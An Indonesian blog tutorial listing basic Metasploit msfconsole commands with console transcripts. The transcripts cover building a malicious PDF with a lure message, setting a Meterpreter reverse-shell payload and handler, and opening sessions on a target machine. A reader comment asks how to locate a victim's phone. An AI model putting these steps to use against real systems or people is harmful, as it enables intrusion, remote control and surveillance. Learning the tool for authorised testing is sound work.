Setelah sebelumnya saya share tentang
Perintah - Perintah dasar Meterpreter sekarang saya akan bagikan Perintah - Perintah dasar Metasploit (msfconsole). kebalik ya hehe, harusnya msfconsole dulu baru meterpreter, tapi gpp deh yang penting tetep sharing :D.
Oke, di bawah ini merupakan beberapa perintah dari msfconsole yang dapat digunakan
msfconsole
Perintah untuk memulai menjalankan msfconsole
banner
Perintah ini digunakan untuk memilih secara acak logo metasploit yang akan di tampilkan
msf > banner
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
http://metasploit.pro
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.4-2015071403 ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
db_status
Perintah ini digunakan untuk mengecek koneksi database postgresql
msf > db_status
[*] postgresql connected to msf
msf >
show exploit
Perintah ini digunakan untuk melihat semua exploit yang ada di metasploit
msf > show exploits
Exploits
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/local/ibstat_path 2013-09-24 excellent ibstat $PATH Privilege Escalation
aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
show payloads
Perintah ini digunakan untuk melihat semua payload yang ada
msf > show payloads
Payloads
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
aix/ppc/shell_interact normal AIX execve Shell for inetd
aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline
show auxiliary
Perintah ini digunakan untuk menampilkan semua module auxiliary
msf > show auxiliary
Auxiliary
=========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability
admin/android/google_play_store_uxss_xframe_rce normal Android Browser RCE Through Google Play Store XFO
admin/appletv/appletv_display_image normal Apple TV Image Remote Control
admin/appletv/appletv_display_video normal Apple TV Video Remote Control
search name
Perintah ini digunakan untuk mencari sebuah exploit atau module yang disebutkan
msf > search pdf_embedded
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent Adobe PDF Embedded EXE Social Engineering
exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent Adobe PDF Escape EXE Social Engineering (No JavaScript)
msf >
use
Perintah ini digunakan untuk menentukan module exploit yang akan digunakan
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) >
set payload
Perintah ini untuk menentukan payload yang akan digunakan
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) >
show targets
Perintah ini digunakan untuk melihat platform target yang dapat diserang dengan exploit yang digunakan
msf exploit(adobe_pdf_embedded_exe) > show targets
Exploit targets:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)
msf exploit(adobe_pdf_embedded_exe) >
show options
Perintah ini digunakan melihat pilihan yang tersedia untuk module atau exploit
msf exploit(adobe_pdf_embedded_exe_nojs) > show options
Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs):
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME msf.exe no The Name of payload exe.
FILENAME evil.pdf no The output filename.
LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area
Exploit target:
Id Name
-- ----
0 Adobe Reader <= v9.3.3 (Windows XP SP3 English)
msf exploit(adobe_pdf_embedded_exe_nojs) >
back
Perintah ini digunakan untuk kembali dari konteks saat ini
msf exploit(adobe_pdf_embedded_exe) > back
msf >
set LHOST
Perintah ini digunakan untuk mengatur IP Attacker, bisa menggunakan IP Lokal atau IP Publik (tergantung kondisi )
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.1.100
lhost => 192.168.1.100
msf exploit(adobe_pdf_embedded_exe) >
set LPORT
Perintah ini digunakan untuk mengatur port lintener
msf exploit(adobe_pdf_embedded_exe) > set LPORT 443
LPORT => 443
msf exploit(adobe_pdf_embedded_exe) >
set RHOST
Perintah ini digunakan untuk menentukan IP Target, (biasa digunakan untuk jenis exploit tertentu)
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
unset
Kebalikan dari
set perintah ini digunakan untuk membatalkan atau menghapus parameter yang sebelumnya di atur, kita juga dapat menghapus semua variabel dengan perintah '
unset all'
msf exploit(handler) > unset payload android/meterpreter/reverse_tcp
Unsetting payload...
Unsetting android/meterpreter/reverse_tcp...
msf exploit(handler) > unset all
Flushing datastore...
msf exploit(handler) >
save
Kita juga dapat menyimpan semua setting yang telah di tetapkan,dan semua akan dimuat ketika startup(saat msfconsole di buka) tanpa mengetur semuanya lagi dari awal.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > save
Saved configuration to: /root/.msf4/config
msf exploit(handler) >
exploit
Perintah ini digunakan mengeksekusi module exploit dan menyerang target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.100:443
[*] Starting the payload handler...
exploit -j
Perintah ini digunakan mengeksekusi module exploit dan menyerang target sekaligus bejalan sebagai background
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.100:443
[*] Starting the payload handler...
msf exploit(handler) >
exploit -z
Hampir sama dengan exploit -j, ini tidak berinteraksi dengan sesi meterpreter ketika exploitasi suskses(otomatis bejalan sebagai background jika exploitasi sukses)
msf exploit(handler) > exploit -z
[*] Started reverse handler on 192.168.1.100:443
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.100:443 -> 192.168.1.103:49272) at 2016-03-02 00:26:39 +0700
[*] Session 1 created in the background.
msf exploit(handler) >
sessions -l
Perintah ini digunakan untuk melihat list sesi meterpreter yang sedang aktif (berjalan sebagai background)
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 SAMSUNG\SAMSUNG @ SAMSUNG 192.168.1.100:443 -> 192.168.1.103:49207 (192.168.1.103)
msf exploit(handler) >
sessions -i ID
Perintah ini digunakan untuk berinteraksi kembali dengan sesi meterpreter yang sedang berjalan sebagai background
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
sessions -K
Perintah ini digunakan untuk mematikan semua sesi meterpreter yang sedang aktif
msf exploit(handler) > sessions -K
[*] Killing all sessions...
[*] 192.168.1.103 - Meterpreter session 2 closed.
msf exploit(handler) >
help
Perintah ini digunakan untuk melihat perintah-perintah dan deskripsi yang dapat digunakan pada msfconsole
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
go_pro Launch Metasploit web GUI
grep Grep the output of another command
help Help menu
Itulah beberapa contoh Perintah - Perintah dasar dari msfconsole, mohon maaf apabila ada bebrapa perintah yang masih kurang. semoga bermanfaat.
sumber
https://www.offensive-security.com
mksh gan saya pelajri
BalasHapuskk suhu itu pada perintah save,cara memanggil file yang di save itu gimana yaa..?
BalasHapusBang kalo saya mentok di session opened itu kenapa saya coba targetnya hp saya sendiri dalam satu jaringan
BalasHapusApakah ada Perintah untuk mengetahui di mana posisi hp korban?
BalasHapusSeperti melacak gitu om